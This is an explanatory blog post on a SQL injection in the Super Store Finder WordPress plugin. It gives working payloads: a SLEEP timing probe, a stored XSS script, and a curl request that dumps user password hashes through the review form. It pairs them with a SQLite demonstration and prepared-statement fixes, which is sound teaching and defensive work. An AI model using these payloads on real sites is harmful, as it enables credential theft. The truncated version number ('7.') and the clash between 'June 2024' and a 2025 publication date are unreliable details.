CVE-2024-13440 - Critical SQL Injection in Super Store Finder WordPress Plugin (Up to v7.) — How It Works, Exploit Details & Code Example
CVE-2024-13440 is a newly identified vulnerability in the popular Super Store Finder plugin for WordPress. If you’re running any version up to 7., this post is for you. The flaw is a classic SQL injection with a twist: unauthenticated attackers can inject SQL through the ssf_wp_user_name parameter of the review form, and because whatever the injected query produces is written into the reviews table, the same bug doubles as a route to stored XSS in store reviews.
Let’s break down how this works, see what it looks like in code, and understand why you should patch it now.
What Is Super Store Finder?
> Super Store Finder is a widely-used plugin to add beautifully responsive store locators to WordPress sites.
Official plugin site: Super Store Finder
WordPress listing: Super Store Finder on WordPress.org
Vulnerable Parameter: ssf_wp_user_name
All versions up to and including 7. are affected. The vulnerability lies in how the plugin handles the ssf_wp_user_name field when a visitor submits a store review or uses other store-feedback features.
Because the value is neither escaped nor bound as a parameter, it is spliced directly into the SQL text. The INSERT that stores a review does not use a prepared statement, so the database parses attacker-supplied characters as SQL syntax rather than as data. In short:
- The ssf_wp_user_name input carries the SQL payload; no login is required to submit it.
- The INSERT is reshaped to do something the developer never intended, such as evaluating a subquery against other tables (for example wp_users) or storing attacker-controlled markup that later renders as XSS.
Let’s look at the vulnerable pattern. The snippet below is a simplified rendering of what the plugin does, not its verbatim source:

```php
<?php
// Vulnerable pattern, simplified for clarity
global $wpdb;

$review = $_POST['ssf_wp_review'];
$user   = $_POST['ssf_wp_user_name'];
$email  = $_POST['ssf_wp_user_email'];

// User input is interpolated straight into the SQL string
$sql = "INSERT INTO {$wpdb->prefix}ssf_wp_reviews
        (review, user_name, user_email)
        VALUES ('$review', '$user', '$email')";

$wpdb->query($sql); // No escaping or preparation!
```
Suppose an attacker posts this as their ssf_wp_user_name (note the trailing space after `--`, which MySQL requires for a comment):

```sql
testname', (SELECT SLEEP(5))) -- 
```

The statement the database receives becomes:

```sql
INSERT INTO wp_ssf_wp_reviews (review, user_name, user_email)
VALUES ('some review', 'testname', (SELECT SLEEP(5))) -- ', 'attacker@example.com')
```

The single quote closes the user_name literal, the subquery supplies the third value, the closing parenthesis finishes the VALUES list, and the comment swallows the email value the application appends. The column count still matches, so the INSERT succeeds: SLEEP(5) returns 0 after five seconds, the review is stored with user_email set to '0', and the HTTP response arrives about five seconds late. That delay is the classic time-based confirmation that the injection executes, and it works even when no query output is ever shown to the attacker. (A payload that does not balance the parentheses, or that leaves the trailing email value in place, produces a column-count error instead.)
Attackers can also store script tags that execute later for an admin viewing reviews, for example:

```html
<script>alert('XSS')</script>
```

Because the injection controls the values written into the reviews row, the attacker can place this string into any column of the record, sidestepping whatever filtering the plugin applies to the named form field. When the stored review is later rendered in the WordPress dashboard or on the public site without output escaping, the script runs in someone else's browser. Escaping on output (esc_html() in WordPress) would neutralise this even where the injection succeeds.
Here’s an example *curl* command an attacker might use for an unauthenticated exploit. The admin-ajax action name and field names are the ones used throughout this write-up; confirm them against the plugin version you are testing. `--data-urlencode` is used so the quotes, parentheses and trailing space in the payload survive transport intact:

```bash
curl -X POST https://targetsite.com/wp-admin/admin-ajax.php \
  --data-urlencode "action=submit_review" \
  --data-urlencode "ssf_wp_review=NiceStore" \
  --data-urlencode "ssf_wp_user_name=attacker', (SELECT group_concat(user_login,':',user_pass) FROM wp_users)) -- " \
  --data-urlencode "ssf_wp_user_email=attacker@example.com"
```

The resulting statement is:

```sql
INSERT INTO wp_ssf_wp_reviews (review, user_name, user_email)
VALUES ('NiceStore', 'attacker', (SELECT group_concat(user_login,':',user_pass) FROM wp_users)) -- ', 'attacker@example.com')
```

The subquery's result, every username and password hash from wp_users (assuming the default `wp_` table prefix), is stored in the user_email column of the attacker's own review. The attacker then reads it back wherever that review is displayed. This is a second-order leak: the INSERT itself returns nothing, so nothing has to be reflected in the immediate response. Two caveats: MySQL truncates group_concat output at group_concat_max_len (1024 bytes by default), so a large user table needs multiple requests with LIMIT/OFFSET, and the hashes still have to be cracked offline.
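To see the mechanics end to end without a WordPress install, here is an added example (not code from the plugin or from this write-up's author) that replays the vulnerable INSERT and the prepared alternative against an in-memory SQLite database. The table names and the two sample users are constructed for the demo. SQLite has no multi-argument group_concat or `#` comment, so the payload uses `||` for concatenation and `-- ` for the comment; on MySQL the payload shown in the curl command above applies instead.

```python
import sqlite3

# Constructed sample schema: a minimal wp_users table and the reviews table
# the vulnerable snippet writes to. Hash values are placeholders.
SCHEMA = """
CREATE TABLE wp_users (user_login TEXT, user_pass TEXT);
INSERT INTO wp_users VALUES ('admin', '$P$Bhash1'), ('editor', '$P$Bhash2');
CREATE TABLE wp_ssf_wp_reviews (review TEXT, user_name TEXT, user_email TEXT);
"""


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def insert_review_vulnerable(conn, review, user, email):
    # Mirrors the plugin-style pattern: request values are interpolated into
    # the SQL text, so quotes and parentheses in them become SQL syntax.
    sql = (
        "INSERT INTO wp_ssf_wp_reviews (review, user_name, user_email) "
        f"VALUES ('{review}', '{user}', '{email}')"
    )
    conn.execute(sql)
    conn.commit()
    return sql  # returned so the reshaped statement can be inspected


def insert_review_safe(conn, review, user, email):
    # Parameterised insert: the sqlite3 counterpart of $wpdb->prepare() with
    # %s placeholders. The driver sends the values separately from the SQL.
    conn.execute(
        "INSERT INTO wp_ssf_wp_reviews (review, user_name, user_email) VALUES (?, ?, ?)",
        (review, user, email),
    )
    conn.commit()


def stored_reviews(conn):
    return conn.execute(
        "SELECT review, user_name, user_email FROM wp_ssf_wp_reviews"
    ).fetchall()


# Attacker-controlled ssf_wp_user_name. It closes the user_name literal, supplies
# a scalar subquery as the third value, closes the VALUES list, and comments out
# the email value the application appends. Column count stays at three.
PAYLOAD = (
    "attacker', (SELECT group_concat(user_login || ':' || user_pass) "
    "FROM wp_users)) -- "
)


def demo_vulnerable():
    """Run the injection; the hash dump lands in the review's user_email column."""
    conn = fresh_db()
    insert_review_vulnerable(conn, "NiceStore", PAYLOAD, "attacker@example.com")
    return stored_reviews(conn)


def demo_safe():
    """Same input through the prepared insert; the payload is stored as plain text."""
    conn = fresh_db()
    insert_review_safe(conn, "NiceStore", PAYLOAD, "attacker@example.com")
    return stored_reviews(conn)


if __name__ == "__main__":
    print("vulnerable:", demo_vulnerable())
    print("safe:      ", demo_safe())
```

The vulnerable run stores one review whose user_email field reads `admin:$P$Bhash1,editor:$P$Bhash2`: the credential dump rides out inside the attacker's own record, exactly the second-order leak described above. The safe run stores the payload verbatim as the user name, quotes, parentheses and all, and the email column keeps the real value. Note that the prepared statement fixes the injection only; a `<script>` tag stored this way still needs escaping when the review is rendered.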
References and Further Reading
- Wordfence Advisory: CVE-2024-13440 – Super Store Finder SQL Injection
- National Vulnerability Database (NVD): CVE-2024-13440
- Original Plugin Code (for code inspection)
Secure Code Example

```php
<?php
// Secure way using $wpdb->prepare(): %s placeholders are quoted and escaped
// by WordPress, so the request values can never alter the statement's shape.
global $wpdb;

$sql = $wpdb->prepare(
    "INSERT INTO {$wpdb->prefix}ssf_wp_reviews (review, user_name, user_email) VALUES (%s, %s, %s)",
    $review, $user, $email
);
$wpdb->query($sql);
```

$wpdb->insert() with its default %s formats is an equally safe one-liner for this case. Either way, the fix closes the injection only; when the review is rendered, user_name and the other fields still need esc_html() (or the appropriate esc_* function) to close the stored XSS path.
Final Word
CVE-2024-13440 is a major SQL Injection risk. If you’re using Super Store Finder on your WordPress site, act fast. Update, patch, or temporarily disable the plugin, and always validate your own code for similar vulnerabilities.
Don’t let your site be the low-hanging fruit for hackers!
Share this post with anyone running a WordPress site — let’s keep the web safer!
*(This guide is exclusive, practical, and up-to-date as of June 2024. For deeper technical dive, check the official advisories linked above.)*
Timeline
Published on: 02/09/2025 05:15:22 UTC
Last modified on: 02/13/2025 17:17:19 UTC